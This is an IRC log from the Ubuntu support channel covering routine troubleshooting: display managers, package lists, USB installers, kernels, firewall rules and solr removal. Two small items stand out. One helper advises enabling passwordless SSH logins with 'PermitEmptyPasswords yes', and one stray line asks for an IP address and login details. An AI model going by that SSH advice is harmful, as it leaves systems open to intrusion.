optional [07:27] Willzor optional: cinnamon (source: cinnamon): Innovative and comfortable desktop. In component universe, is optional. Version 3.4.6-1 (artful), package size 315 kB, installed size 1305 kB [07:27] morning MonkeyDust [07:27] lotuspsychje [07:27] So just install normal Ubuntu and come back here and you all can help me? [07:27] Willzor: sure mate [07:27] Willzor: we reccomend you to use ubuntu on daily base [07:28] !download | Willzor [07:28] Willzor: Ubuntu installation CDs can be downloaded from http://releases.ubuntu.com - Mirrors can be found at https://wiki.ubuntu.com/Mirrors - PLEASE use the !torrents to download !Artful, and help keeping the servers' load low! [07:28] Because at that point, unless proven wrong by some advanced ubuntu user, I will have come to the conclusion that it's literally impossible to reenable a display manager on this distro once you've disabled display-manager.service. [07:28] k12: i hosed my 16.4 real bad, i was going to reinstall, and decided on 18.4 and it let me upgrade my 16.4 and it fixed all my problems [07:28] Go to 17.10? and is there a command to list what all i have installed on here to get it on the fresh install? [07:29] !info aptoncd | Willzor [07:29] Willzor: aptoncd (source: aptoncd): Installation disc creator for packages downloaded via APT. In component universe, is optional. Version 0.1.98+bzr117-1.4 (artful), package size 213 kB, installed size 1561 kB [07:29] I'm probably just going to return to arch if this doesn't work. Because as tough as arch is, at least this display manager issue is completely non-existent as long as x.org is completely installed. [07:29] Willzor: comm -23 <(apt-mark showmanual | sort -u) <(gzip -dc /var/log/installer/initial-status.gz | sed -n 's/^Package: //p' | sort -u) > /path/to/installedpackages [07:29] installed properly * [07:30] k12: just purge lightdm and try recoverymode fix broken packages? [07:30] Im confused on those commands [07:31] Willzor: the whole line is the command, just replace /path/to/installedpackages with the path you want [07:31] Im just trying to list what all is installed on here so once i get over i can copy it [07:32] Willzor: that's what it does [07:32] k12: create a symlink from /lib/systemd/system/lightdm.service to /etc/systemd/systemd/display-manager.service [07:33] nvm it worked. [07:34] this is the error /var/log/installer/initial-status.gz: No such file or directory [07:34] After I ran dpkg-reconfigure blah blah blah I found out where all the .service files are, and just created a symlink manually. [07:34] Finally got it working. [07:35] Willzor: "dpkg --get-selections > /path/to/installedpackages" works too [07:35] ducasse: yep, tried that, and that fixed it. Would be nice for the ubuntu devs to make it so I could do that automatically through systemctl though, rather than have to manually create one. [07:35] Willzor: just it lists everything, even dependencies [07:35] But finally, the display manager loads on boot. -_- I can finally rest peacefully. [07:36] k12: devs are not responsable for what users try to do [07:37] Willzor: maybe "apt-mark showmanual" is better, i'm not sure though [07:37] k12: it seems the .service files now need a new [Install] section added to them for systemctl enable to work, guess that needs to be done still [07:38] apt-mark showmanual: command not found [07:38] lotuspsychje: yeah, sure. Has nothing to do with "what users try to do", it's basic functionality that we can't have on Ubuntu, but literally every distro ever. Anyway, I found my solution, I'm moving on. [07:38] ducasse: ah. I suppose that makes sense. [07:39] Willzor: hmm, what does 'dpkg -l apt' show? [07:39] and "ls -l /usr/bin/apt-mark" ? [07:40] dpkg -l apt: command not found [07:40] Willzor: how about "ls -l /usr/bin/dpkg" ? [07:40] k12: just out of curiosity, why did you try switch display managers instead of switching DE's? [07:40] k12: it's a new requirement in newer systemd versions, probably takes a little while for all the packages to catch up [07:41] "ls -l /usr/bin/dpkg" bash: ls -l /usr/bin/dpkg: No such file or directory [07:41] Willzor: don't type the quotes [07:41] ls -l /usr/bin/dpkg -rwxr-xr-x 1 root root 278264 Mar 14 15:44 /usr/bin/dpkg [07:42] Willzor: ok, try 'apt-mark showmanual > /tmp/packageslist' [07:42] without quotes [07:42] lotuspsychje: because prior to that, I knew how to configure lightdm far better than gdm3, and I didn't want to configure gdm3, because apparently that's done by editing config files, whereas there's lightdm-gtk-greeter-settings for lightdm-gtk-greeter. [07:42] Nothing at all [07:42] I guess I'll keep searching for a configuration tool for gdm3. [07:43] Willzor: ok 'cat /tmp/packageslist' [07:44] Thats listing a lot of stuff [07:45] Willzor: those are the manually installed packages [07:45] The repos cant i take them and use it on the normal Ubuntu? [07:45] Willzor: bad idea [07:45] lindoz-applets lindoz-backgrounds lindoz-mouse-cursors lindoz-theme-icons-extra lindoz-theme-windows-10 lindoz-theme-windows-7 lindoz-theme-windows-8 lindoz-theme-windows-classic lindoz-theme-windows-vista lindoz-theme-windows-xp [07:46] Willzor: no, dont do that at all [07:46] tomreyn: Are you around? [07:47] Willzor: make your life easy, install a supported ubuntu version from our topic then come back here [07:47] Ascavasaion: paste that error to EriC^^ he might have a clue [07:47] I will whats a good USB tool? [07:47] Willzor: dd [07:48] EriC^^: Ascavasaion got a freeze after installing ubuntu with an uefi warning db [07:48] Whats the full name? im getting a lot of other things [07:49] Willzor: the command is "sudo dd if=/path/to/iso of=/dev/sdX bs=4M && sync" [07:49] replace /dev/sdX with your usb name from 'sudo parted -ls' [07:49] Anything with a GUI? :( [07:49] !usb | Willzor [07:49] Willzor: For information about installing Ubuntu from USB flash drives, see https://help.ubuntu.com/community/Installation/FromUSBStick - For a persistent live USB install, see: https://wiki.ubuntu.com/LiveUsbPendrivePersistent [07:50] hi [07:50] Ascavasaion: restate your issue if you want [07:52] Now should i get 17.10 or 16? [07:52] Willzor: 16.04.4 [07:53] anyone ? [07:53] Willzor: 5 years support, it's up to you [07:55] mahdi hi, this is ubuntu support, ask your question === marve is now known as Guest28140 [08:00] how can i delete an icon from the dash ? [08:01] EriC^^: I did an Ubuntu 16 installation... it stated that it was finished and time to reboot. I hit reboot... it dropped out of GUI and in text it said something bout firmware error... I Googled and advice was "sudo apt-get install intel-microcode". I did that. Then I got "MODSIGN: Couldn't get UEFI db list" and it froze... I eventually hit the reset button and it has not done it since. [08:01] mahdi: on your mouse there's a right button, click on your icon and remove [08:02] Alright im installing ill be back very soon [08:02] lotuspsychje: it dosen't have anything for removing something [08:02] does anybody who use ibus under ubuntu? [08:03] Willzor: great, welcome to the ubuntu community [08:03] !ask | choice [08:03] choice: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-) See also !patience [08:04] !parience [08:04] :D, got that. I found that ibus not always works under ubuntu [08:04] !patinence [08:05] when i use ibus , it could work very well when use browser, shell, but not work under intellij phpstorm/Idea [08:05] but fcitx works fine [08:05] Hey all, just had the biggest headache installing Ubuntu 16.04 on a new laptop, a Metabox N850HJ-i5, using the normal installer and unetbootin to create a bootable USB seemed to work so far as getting it installed, at the end of the install it would hang but seemed to install the OS, then when trying to login, would get past the login screen only to hang, couldn't change to any of the tty screens as that would hang, same result [08:05] with 17.10, then tried the mini editions as per https://help.ubuntu.com/community/Installation/MinimalCD which seemed to work just fine (Gnome had some screen flickering but that was solved changing to nVidia drivers), though NO wifi, after much googling, and reading through dmesg, the big issu, was running Kernel 4.4, so an update later and no wifi, sharing this out of frustration and sure it should be fixed in 18.04 with the [08:05] new minimal option but thought i would share [08:06] but it looks fcitx is not a original input method for ubuntu( Just my feeling) [08:06] normal installer being the standard x64 iso [08:07] Maraket: do you really need minimal? === apsknight1 is now known as apsknight [08:08] lotuspsychje: no, it was the only work around I could get it to get past the login screen, I suppose I could have used the live usb to check the logs and figure from there, but only thought of that now :P [08:08] Does this mean my Broadcom will work on the current Kernal now? [08:09] Maraket: if your graphics result in black screen try !nomodeset [08:09] Willzor: for making broadcom work, you need the restricted-extras [08:09] Ascavasaion: https://ubuntuforums.org/showthread.php?t=2380700&p=13732697#post13732697 [08:09] lotuspsychje: wasn't the exact issue, it wouldn't load up any of the icons or anything, it seemed to just sit on the background with the cursor, and nothing else [08:10] Maraket: what kind of graphics do you have? [08:11] lotuspsychje: GTX 1050, though unsure why the minimal would work when the full wouldn't (mind you the full also did do updates during install, and tried without updates as well) [08:11] Maraket: for making that card work you might have to enter !nomodeset first [08:12] lotuspsychje: something to try in the future, got it working now so I'm happy :P [08:13] !bug | Maraket feel free to report when you find one [08:13] Maraket feel free to report when you find one: If you find a bug in Ubuntu or any of its derivatives, please report it using the command « ubuntu-bug » - See https://help.ubuntu.com/community/ReportingBugs for other ways to report bugs. [08:14] lotuspsychje: I normally would, but the issue is I have no idea what the issue was with, if it was indeed the graphic driver, or something else, I suppose I could do further testing now I know A solution, but for now I am a little beat :) will check into it in the future and see if 18.04 LTS has the same issues. If it does I'll most definitely do a thorough investigation and share what I find [08:15] Maraket: allrighty, glad you solved it [08:19] hello some german speaking people here? [08:19] !de [08:19] In den meisten Ubuntu-Kanälen wird nur Englisch gesprochen. Für deutschsprachige Hilfe besuche bitte #ubuntu-de, #kubuntu-de, #edubuntu-de oder #ubuntu-at. Einfach "/join #ubuntu-de" eingeben. Danke für Dein Verständnis! [08:25] I know this is purely subjective, but which channel would be the best to ask people of which Desktop Environment should I go with since I am not a huge fan of Unity [08:25] !flavors | Maraket [08:25] Maraket: Recognized Ubuntu flavors build on Ubuntu and provide a different user experience out of the box. They are supported both in #ubuntu and in their flavor channel. For a list, see https://www.ubuntu.com/download/ubuntu-flavours [08:28] Maraket: #ubuntu-offtopic [08:28] Maraket: or #ubuntu-discuss [08:33] Alright im back [08:34] Whats the first step for this? [08:37] Anyone? === sudheendra_ is now known as sudheendra [08:39] first step for ?? (people come and go...) [08:40] Willzor, (sorry see last msg) [08:40] Willzor: type "sudo parted -ls" and get the name of the USB [08:40] /dev/sd.. [08:40] Its already Ubuntu [08:40] ALready reinstalled [08:41] Willzor: what are you asking exactly? [08:41] how do i begin troubleshooting my lubuntu server which crashed this morning (it didnt respond to a ping) so i physically restarted it... [08:41] The reason i moved over was someone said they can help me make this Ubuntu look like the other OS i used [08:41] steenman: look into "/var/log/kern.log" [08:41] whats the linux equivalent of event viewer :)? [08:42] ok [08:42] thxs [08:42] steenman: no problem [08:43] Sorry firefox crashed [08:45] there are only two entries in the log from before the crash [08:45] !paste | steenman [08:45] steenman: For posting multi-line texts into the channel, please use https://paste.ubuntu.com | To post !screenshots use https://imgur.com/ !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic. [08:45] http://www.makululinux.com/wp/lindoz/ thats the site of the OS i was using [08:46] i suppose i dont know it crashed just i coulnd ping [08:46] willzor__: maybe restate your question and someone might pick up the question [08:46] ok ubottu [08:47] I did, someone told me once i get Ubuntu installed theyll help me make it like this the other person was helping me with you === willzor__ is now known as willzor [08:47] EriC^^: the log does not go back far enough [08:48] willzor: no, we said you could get support here [08:48] steenman: try /var/log/kern.log.1 [08:48] Hmm someone said theyll help me get it almost just like that one once i fishing reinstalling [08:49] ah yes [08:49] With themes and such, i dont have logs that go back that far or i would know the person who said it [08:51] it doesnt seem to catergorise events in this file [08:51] So no one can help me? [08:51] willzor: ask the question fully, every 10mins or so and see [08:52] I dont know where to begin that other person knew more about what steps i needed then i do [08:52] steenman: yeah, you want to look for errors and such, maybe 'grep -i error /var/log/kern.log.1' [08:52] willzor: how about 'i'm trying to make my ubuntu look like xxxx os, can anyone help?' [08:53] Who was it that said good morning to you i remember that was the one who said they know a good bit and willing to help once i get over to Ubuntu [08:54] willzor: you're thinking of lotuspsychje, but he's afk right now [08:55] Im on Ubuntu and trying to make my OS look more like the Makululinux Lidoz Heres the site http://www.makululinux.com/wp/lindoz/ Anyone willing to help me try and setup my system like that please? [08:56] Yea thats the person [08:57] willzor: I would ask the dev(s) of Lindoz about how their customizations [08:59] So really i just reformatted for nothing is what your saying. as someone told me i could get help after i did XYZ and ive done XYZ but now i gotta go threw even more hoops just to get it figured out? [08:59] it's just the icons and themes [09:00] willzor: why did you format your previous installation? [09:00] Beacuse i was told too? [09:01] yeah... no, that's not how it works [09:01] what is the reason? [09:01] like, did you install an outdated ubuntu release? [09:02] "we dont support that Discro install ubuntu and we will help you" [09:02] that's an obvious requirement if you want support from this channel [09:02] in case you did not have ubuntu installed before [09:03] I did have it but wasnt a dummbed down version [09:03] with that logic, you should also ask in #debian cause ubuntu is based on that [09:03] possibly #kernel too [09:04] :D [09:04] so, you have to install the Cinnamon DE (sudo apt install cinnamon), and then try to obtain the resources (wallpapers, icons, themes,..) from LinDoz [09:05] we can't really help with the second part [09:05] and lxpanel [09:05] no nvm it's not === V7 is now known as VjdfMQ === apsknight1 is now known as apsknight [09:34] Is neomutt available as a package for 16.04? [09:34] If it's not how do i get it? [09:34] i only see it for bionic widp https://packages.ubuntu.com/search?keywords=neomutt [09:34] What's bionic? [09:35] 18.04 [09:35] I see. [09:35] So no 16.04 package, I am not sure how I feel about this. [09:36] On the one hand I've spent the entire day playing around with configs , now it has led to the point where I might finally have to upgrade. [09:37] If only there was a ppa available. [09:37] maybe you could ask on #neomutt - but I know nothing about neomutt (hadn't heard of it before your question) === imadz714 is now known as imadz713 === sudheendra_ is now known as sudheendra [09:43] on ubuntu 17.10n why is it i cant install neither gwenview nor gpicview ? [09:45] nor gthumb [09:46] "no available version" [09:46] could it be that the 'universe' repo is disabled? [09:46] check "apt-cache policy" [09:49] https://help.ubuntu.com/community/Repositories/Ubuntu [09:51] i added "deb http://archive.ubuntu.com/ubuntu/ artful main restricted universe multiverse" to sources.list [09:51] how long does upgrading from 16.04 to 18.04 take? [09:51] should I expect a lot of breakage? [09:51] it will take a while [09:52] Hi folks [09:53] widp: I doubt that you can answer that question with a simple yes or no [09:53] widp, 18.04 hasn't been released yet so currently is offtopic on this site (it's channel is #ubuntu+1) [09:53] I see. [09:53] s/site/channel/ [09:54] I wonder when 16.04 was released. [09:54] 2016 04 [09:54] (year.month is the ubuntu release version numbering) === martijn is now known as m4rtijn [09:56] I see. === imadz714 is now known as imadz713 [09:59] safely remove on USB storage like flash or external hdd is take very long time to affect. how can i report it ? Ubuntu 18.04 (development branch) [10:03] sweb1, 18.04 channel is #ubuntu+1, so you could ask there. the obvious answer is looking for a bug (report) on launchpad or raising one... [10:10] sweb1: sometimes if you copied a lot of data to it, it'll take a lot of time while it syncs (when it's actually copying the data there) [10:10] sweb1: if you haven't copied anything to it and it takes a lot of time, something is wrong [10:10] EriC^^: i hade another laptop with ubuntu 16.04 same hardware it's sync fast ... as usual ... but this is take very long time about 30 minutes [10:13] that's a lot === marve is now known as Guest96765 [10:16] sweb, i improved a lot sync time [10:16] following some advice in https://unix.stackexchange.com/questions/180818/gnome-nautilus-copy-files-to-usb-stops-at-100-or-near [10:16] also see http://lwn.net/Articles/572911/ [10:17] edit /etc/sysctl.conf and add "vm.dirty_background_bytes = 16777216" and "vm.dirty_bytes = 50331648" [10:19] How do I install go (or git2go?) on Ubuntu such that "go get some/github/repo" works? I installed the go snap via "sudo snap install go --classic" and when I try the above I get "# github.com/libgit2/git2go go/src/github.com/libgit2/git2go/blame.go:4:18: fatal error: git2.h: No such file or directory" [10:19] brainwash, here is my apt-cache policy : http://pastebin.fr/53370 [10:20] does it show something to repair ? [10:21] hmm id did some preferences edit once - that's probably the issue [10:22] after I compiled something is it safe to remove the -dev packages ? [10:28] rm /etc/apt/preferences [10:28] might fix my issue [10:30] ericrajuin: Should be, but won't you just need them again to compile the next time? [10:32] yes fixed [10:33] oh I didn't thought of that [10:35] every file has an extension , what will be the extension if file is created by "$touch file" [10:37] <_Strix_> hello [10:38] <_Strix_> Can anyone please help me how to find when the kernal was last updated? [10:39] _Strix_: check dpkg logs [10:39] <_Strix_> I am using ubuntu 14.04 [10:39] _Strix_: uname -a to see your current kernel [10:39] "touch file" will create "file" file lol, along with its extension when there is one s10gopal [10:40] <_Strix_> Linux 4.13.13-4-pve [10:41] if we dont provide any extension what is default extension ? is touch file and touch file.txt are same ? [10:41] s10gopal: nothing, there is no default extension [10:41] jluc: so, you were able to activate artful/universe? [10:42] s10gopal, *nix doesn't use extensions by default. a file [type] is determined by its contents, not the part of its name - use `file filename` to see what a filetype is for filename [10:42] touch file and touch file.txt are not same [10:42] <_Strix_> lotuspsychje, current kernal is Linux 4.13.13-4-pve [10:42] Hey all [10:42] I've added ufw and added rules: [10:42] _Strix_: yes? [10:43] <_Strix_> I am not finding anything in dpkg.log [10:43] <_Strix_> about kernal [10:43] So, now an internet doesn't work [10:43] https://hastebin.com/igubexutup.http [10:43] VjdfMQ: perhaps #netfilter can help? [10:43] The Internet * [10:44] Thank you lotuspsychje [10:44] thx [10:45] give your ip address & login details [10:45] I think the kernel packages are named "linux-headers" and "linux-image" something [10:45] what a ? [10:45] ericrajuin: Also linux image extra [10:53] VjdfMQ : I think the ufw rules need to allow outbound connections as well [10:53] just a guess [10:56] how to intall kernel 4.9 on ubuntu 14.04 lts [10:56] so after some update i now boot into purple screen and it freezes.. there was some mention of uefi something the first time of booting after the update.. what might it be? it's ubuntu 16.04 [10:57] linux-headers-4.9.0-040900_4.9.0-040900.201612111631_all.deb linux-headers-4.9.0-040900-generic_4.9.0-040900.201612111631_amd64.deb linux-image-4.9.0-040900-generic_4.9.0-040900.201612111631_amd64.deb only these files are required to download ? [11:00] s10gopal, where are the 4.9 [kernel] from? i don't see 4.9 in the support kernels on https://wiki.ubuntu.com/Kernel/Support [11:00] s/support kernels/supported kernels/ [11:00] http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.9/ [11:02] guiverc, i want to test ml 4.9 on ubuntu 14.04 lts [11:03] I booted from the live CD [11:03] I installed openssh-server this is enabled [11:03] What is the default username and password? === marve is now known as Guest91849 [11:03] ubuntu/ubuntu no go [11:04] s10gopal, maybe look at http://ubuntuhandbook.org/index.php/2016/12/install-linux-kernel-4-9-ubuntu-linux-mint/ -- but i've not used it [11:04] TyrfingMjolnir: should be ubuntu, no pwd [11:05] guiverc, thx [11:07] do i need to do anything after using 'sudo rm /etc/init.d/solr'? [11:07] apparently i should have used this instead 'You are missing this, if you want to re-install it again. sudo update-rc.d -f solr remove and sudo rm -rf /etc/default/solr.in.sh ' [11:07] maybe update-rc.d solr remove [11:07] right [11:07] i already used the command [11:08] ppf [11:08] ppf: Ubuntu/ also no good [11:09] codecutter: okay? [11:09] i used ''sudo rm /etc/init.d/solr''. instead of ' update-rc.d -f solr remove' [11:09] TyrfingMjolnir: why, what happens if you try? [11:10] codecutter: yeah those don't do the same thing [11:10] but provide some context for me please, what are you trying to do exactly? [11:10] ppf: remvoed solr manually https://askubuntu.com/questions/680690/how-to-uninstall-solr [11:11] hey all: I'm sorry if this has been asked 100x times before. But as an end-user, what are the main benefits of running ubuntu over debian? [11:11] codecutter: okay, and what's the issue? [11:11] iBurger21: #ubuntu-discuss please [11:11] okay [11:12] ppf: i used ''sudo rm /etc/init.d/solr''. instead of ' update-rc.d -f solr remove', how do i fix this? [11:12] run update-rc.d -f solr remove [11:13] ppf: Permission denied, please try again. [11:13] but i already removed it using ''sudo rm /etc/init.d/solr'' ? [11:13] that's not what update-rc.d does [11:13] whats the diff between these 2 commands? [11:14] update-rc.d manages symlinks between /etc/rc$N.d and the init files [11:14] ah [11:15] now i need to reinstall the latest version, installed previous manually, is there a apt-get version available for solr [11:15] ? [11:15] !info solr [11:15] Package solr does not exist in artful [11:16] hmm [11:16] !info solr-tomcat [11:16] solr-tomcat (source: lucene-solr): Enterprise search server based on Lucene3 - Tomcat integration. In component universe, is optional. Version 3.6.2+dfsg-10+deb9u1build0.17.10.1 (artful), package size 7 kB, installed size 37 kB [11:16] i need solr v.7 [11:17] codecutter: then you'd probably best install from source [11:18] codecutter: what is your endgame though [11:18] you just wanna run that server? [11:18] standalone [11:18] then why not use docker [11:19] i don't have docker setup [11:19] don't ask me to setup docker only for solr [11:19] :) [11:20] this is what they call a preemptive response : [11:20] people still use solr? There is elastic.co [11:20] i'm already using solr, why would i want to change it? do you have a compelling reason? [11:21] I never really had any compelling reason to use any java project [11:21] codecutter: what's there to set up [11:21] I do use elasticsearch and beats though... [11:21] codecutter: Why not compile from source? [11:21] well, elastic appears to be commerical? [11:22] ericrajuin: What do you mean ? [11:22] i guess what i'll have to do [11:22] codecutter: es is open source, some of the plugins are commerical [11:22] They're already opened. Arent they ? [11:22] "Deploy a 14-day trial with 4 GB RAM, 96 GB storage, Kibana, X‑Pack, and more.' [11:22] i see [11:22] codecutter: I never did that [11:23] I registered and that allows me to run elasticsearch, kibana, logstash, and beats for free [11:23] One thing I did do however is to install free plug-ins [11:23] There are also commercial plugins [11:24] Then again the free version supposedly exceeds solr [11:24] in features [11:24] brainwash, i could install yes [11:24] and use docker for either [11:25] codecutter: What is your project? [11:25] Hi, i have a question about LTS, when will Canonical launch the new LTS? [11:25] (or whatever your favorite container orchestrator is) [11:25] !isitout | GasterFQ [11:25] GasterFQ: Not yet! [11:25] removing /etc/apt/preferences cleaned the situation [11:25] GasterFQ: soon! (tm) [11:25] Thanks! [11:25] 18.04, no? [11:26] TyrfingMjolnir: search for user accounts and companies [11:26] codecutter: Where? [11:26] my own server [11:27] ? [11:27] Link? [11:28] maybe later, its down at the moment [11:28] installing solr :) === jstein_ is now known as jstein [11:32] TyrfingMjolnir: could be that sshd is forbidding passwordless connections [11:32] either set 'PermitEmptyPasswords yes' or give the user a password [11:33] ppf: It says something about pass not installed and will have to add universe [11:33] passwd [11:34] It says passwd not installed and will have to do apt install pass from universe [11:35] hye [11:35] TyrfingMjolnir: ? [11:36] !info passwd [11:36] passwd (source: shadow): change and administer password and group data. In component main, is required. Version 1:4.2-3.2ubuntu4 (artful), package size 771 kB, installed size 2454 kB [11:36] that's neither universe nor not installed [11:36] any one here [11:36] not installed [11:36] ithink so ?? [11:37] !details | cvdd43, [11:37] cvdd43,: Please elaborate; your question or issue may not seem clear or detailed enough for people to help you. Please give more detailed information; for example, we might need errors, steps, relevant configuration files, Ubuntu version, and hardware information. Use a !pastebin to avoid flooding the channel. [11:37] what :) === mkv is now known as m4v [11:38] this is ubuntu support. please stay on topic. [11:39] who is from U.S.A [11:40] Nobody wants to admin, cvdd43 [11:41] How can I turn off hibernation? [11:41] what [11:41] ???? [11:41] I just lost the IP address [11:41] ip of what?? [11:41] of the live CD running [11:42] Due to hibernation [11:42] oh!! [11:42] can any one tech me how to use hex chat [11:43] because today its my first day to use it [11:43] cvdd43, you are already using it. [11:43] i know but [11:43] There is no exa? [11:43] What is hex chat? [11:44] apt-get install exa [11:44] E: Unable to locate package exa [11:44] cvdd43, and, amazingly, there's actually a topic in hexchat with complete instructions! [11:44] alguien sabe algun canal en espaöol [11:44] !es | alfepu [11:44] alfepu: En la mayoría de los canales de Ubuntu, se habla sólo en inglés. Si busca ayuda en español entre al canal #ubuntu-es; escriba " /join #ubuntu-es " (sin comillas) y presione intro. [11:44] when i exit it and return to open it all the channels disappeared [11:44] so i use to put them all again [11:45] because you didn't set up the channels. Read the help menu, it's explained there [11:45] how to set up them [11:45] ?? === imadz714 is now known as imadz713 [11:47] please help!! [11:47] https://hexchat.readthedocs.io/en/latest/ <<< read the friendly manual [11:47] cfhowlett: I doubt cvdd43 cares if there is one; probably you can tell him/her where it is. [11:47] yes iwill now [11:48] https://hexchat.readthedocs.io/en/latest/faq.html#how-do-i-autoconnect-and-join-a-channel-on-start [11:49] yes thanks so much chfhowlett [11:49] happy2help! and welcome to *buntu [11:50] tomreyn: Are you here? [11:51] the livecd username login is livecd I believe [11:51] cvdd43: What's wrong with irssi? [11:52] just asecond [11:55] it doesnt work [11:55] theres a bug where when im resizing a window a black box flashes around it [11:56] is this known [11:56] A black box flashes around what? [11:57] who have kali linux here [11:58] no one. this is ubuntu support. kali is not supported [11:58] yes [11:58] !kali | cvdd43 [11:58] cvdd43: The Ubuntu channels can only provide support for Ubuntu and its official flavors, since other distributions and derivatives have repository and software changes. So please use their dedicated support venues, for example: Linux Mint (#linuxmint-help on irc.spotchat.org), Kali Linux (#kali-linux), and LXLE (#lxle) [12:08] who is online [12:09] admin meeeee!!! [12:09] cvdd43: do you have an ubuntu support question? [12:09] some how ;) [12:10] cvdd43: for "some how": [12:10] !ot [12:10] #ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please register with NickServ (see /msg ubottu !register) and use #ubuntu-offtopic for other topics (though our !guidelines apply there too). Thanks! [12:10] /msg ubottu !register [12:11] wtf [12:11] iam sorry [12:14] how old are you guys [12:14] ??? [12:15] cvdd43, dude. stop. this is not a chitchat channel. [12:15] hhh [12:15] ;) [12:15] ohh [12:15] iam sorry [12:15] perhaps #ubuntu-offtopic would be better for you. In any case, read and follow the !guidelines [12:17] tomreyn!!! [12:18] tomreyn: I eventually got 64 bit Ubuntu onto that machine... went back into the logs and did each step you and TJ- told me. It worked PERFECTLY and all the data seems to be intact as well. [12:18] is there a way to search youtube so that yt doesn't knw that Ive search such words [12:19] and to dl such video ofc [12:19] no you cant [12:19] sounds like a youtube support query, not an ubuntu query. [12:19] Does ubuntu 18.04 come with gnome or unity? [12:20] ericrajuin, download is easy. youtube-dl youtubeURLgoeshere [12:20] I guess it's not ubuntu related [12:20] yes i am famaliar with yt-dl [12:20] aarrggghhmonster, by default, it will come with gnome. unity is no longer being officially supported [12:20] cfhowlett: That's fine [12:20] I'm happy to see it's coming out quite soon. I want to re-install ubuntu but I can wait a month I suppose [12:21] if you have sufficient ram, you could always do a virtualbox best of the 18.04 beta [12:21] Too much effort for no gain? [12:21] well, you seemed a bit ... impatient? [12:22] You won't even have to wait that long...beta's out in like a week [12:23] How can I make an account that runs a script and logs out? [12:23] If I would like to do useradd -m reboot [12:23] and have a script in user reboot that does: init 5 [12:23] I want the script to run auto magically [12:26] Hi guys. I'm installing 17.10 in VMWare Workstation pro. Does 4GB memory, 4 processors (1 core per processor) and 10GB storage sound OK. The computer is a Lenovo X1 Carbon (5th gen) with 8GB Ram, i5-7200U @ 2.50GHz (4 CPU) [12:26] YES ITS GOOD [12:27] TyrfingMjolnir: automatically when [12:27] promille, yes, that should do nicely. [12:27] cfhowlett: thanks. is it overkill? [12:28] promille, open 5 -6 ffirefox tabs, start a youtube video and see what happens [12:28] start eclipse [12:28] Well its a little late after I've made the VDI :) [12:29] But I tried with 1GB ram and 1 CPU and firefox was very slow [12:29] ppf: if I do ssh reboot@10.0.0.10 [12:29] ah [12:30] 1gb ram? yeah, that would happen [12:30] It should not give me a terminal; the script should run [12:30] why not do ssh 10.0.0.10 reboot [12:30] cfhowlett: that was the default setting in workstation, I was a little surprised ^^ [12:30] TyrfingMjolnir: literally has the same amount of characters [12:30] Because the actual command is not reboot [12:30] TyrfingMjolnir, is it a repeating thing? If so there's always cron [12:30] It's a set of services [12:31] TyrfingMjolnir: you can run a script [12:31] Once every 1 - 15 days [12:31] then put the reboot script into your path and name it reboot [12:31] When a service hangs [12:31] hello i am trying to change the permissions on a folder on the terminal with sudo chown -R username:group directory, but the directory i'm trying to access has a space in the middle as in "this drive" and my terminal says there is no directory, what can i do? [12:31] this\ drive [12:31] anyone where that can help me to setup dnscrypt-proxy on Ubuntu 17.10? After follow this guide at: http://www.ubuntubuzz.com/2017/11/how-to-install-dnscrypt-on-ubuntu-1710.html my network was lost and i could not connect to internet. I sould add that the guide is rong at some places, rm or modify /etc/resolv.conf is useless because that file is overwritten or restore at next system boot. [12:31] or, you know, "this drive" [12:31] concretelogic: use double quotes on it, chown -R username:group "this drive" [12:32] seriously? [12:32] concretelogic: yeah :) [12:33] damn, i answered my own question, not fair, I think it's working now, thank you so much [12:33] ;) [12:33] :) [12:33] haha :D no problem [12:35] :) [12:36] cfhowlett: I wasn't being impatient. I just want a clean install of ubuntu [12:36] I'll wait a month and do it then :-) [12:36] sounds like a plan. [12:36] although ... [12:36] Anyone here facing hang while installing ebtables on 17.10? [12:37] although what? [12:37] are you running LTS only? if so, you might want to wait a bit. I only install at the .1 release to get the first round of fixes out of the way. YMMV [12:37] Or know where to find log_daemon_message output? [12:37] I stick to LTS because I dislike how many wifi driver issues I get otherwise [12:39] Actually the hangup is while starting the ebtables service, journalctl doesn't give any useful info other than "Starting ebtables ruleset management" [12:40] but the start script contains some log_**_message calls, might be helpful if I could find where their output goes [12:41] But since starting it is a part of installation the installation also hangs [12:41] or does dnscrypt only work on wired connections and not wifi? [12:44] Just went to install gns3-gui to run some virtualbox VMs, now I'm actually digging ebtables startup issues [12:51] Can someone help me with that? === EriC^ is now known as EriC^^ === apsknight1 is now known as apsknight === ||| is now known as || === || is now known as | === | is now known as ||| [13:07] <|||> /part === pc is now known as Guest50017 [13:14] hi, got this application that was zipped, you launch it from terminal by calling a .sh script that adds a PATH [13:14] how can I make a .desktop launcher, just writing the .sh does not work [13:30] chimango: I think in the desktop file, the exec part ; exec="path to your script/ script.sh" [13:42] Good day, I have a question about packages. I run Ubuntu server and website beyondsecurity[dot]com reports "high risk" vulnerability issues that are beyond my expertise to understand. I plan to educate myself on these but was wondering if there was any way to have Ubuntu pull packages that are more up to date and if it would be considered a high risk to do so. [13:43] I mean, there is a difference between up to date and going full Arch experemental is there? Or is there not? I'm running Ubuntu 16.04.4 LTS. [13:43] I a mgetting connection refused for every web server I try to use. [13:43] Ascavasaion: glad to hear this, thanks for the feedback [13:44] I mean local host web servers. [13:44] One example of what I am getting: * In Apache httpd before 2.2.34 and 2.4.x before 2.4.27, the value placeholder in [Proxy-]Authorization headers of type 'Digest' was not initialized or reset before or between successive key=value assignments by mod_auth_digest. Providing an initial key with no '=' assignment could reflect the stale value of uninitialized pool memory used by the prior request, leading to leakage of [13:44] potentially confidential information, and a segfault in other cases resulting in denial of service. [13:45] Sorry for the novel guys. I actually typed all this except for the security alert obviously. [13:45] rockdarko: There's going to be a new LTS coming in a week or so, so that's good new for you [13:45] !latest | rockdarko [13:45] rockdarko: Packages in Ubuntu may not be the latest. Ubuntu aims for stability, so "latest" may not be a good idea. Post-release updates are only considered if they are fixes for security vulnerabilities, high impact bug fixes, or unintrusive bug fixes with substantial benefit. See also !backports, !sru, and !ppa. [13:45] albrecht: Lovely. Thanks. [13:45] rockdarko: please read ubottus message [13:46] tomreyn: So basically, when it comes to packages, there is Ubuntu-safe and Arch-risky and no really in-between? [13:46] the software you get in ubuntu receives security patches, backported from current version sof the software [13:46] tomreyn: I did, thanks so much. [13:46] tomreyn: oh, interesting. [13:46] I've tried nginx, php artisan 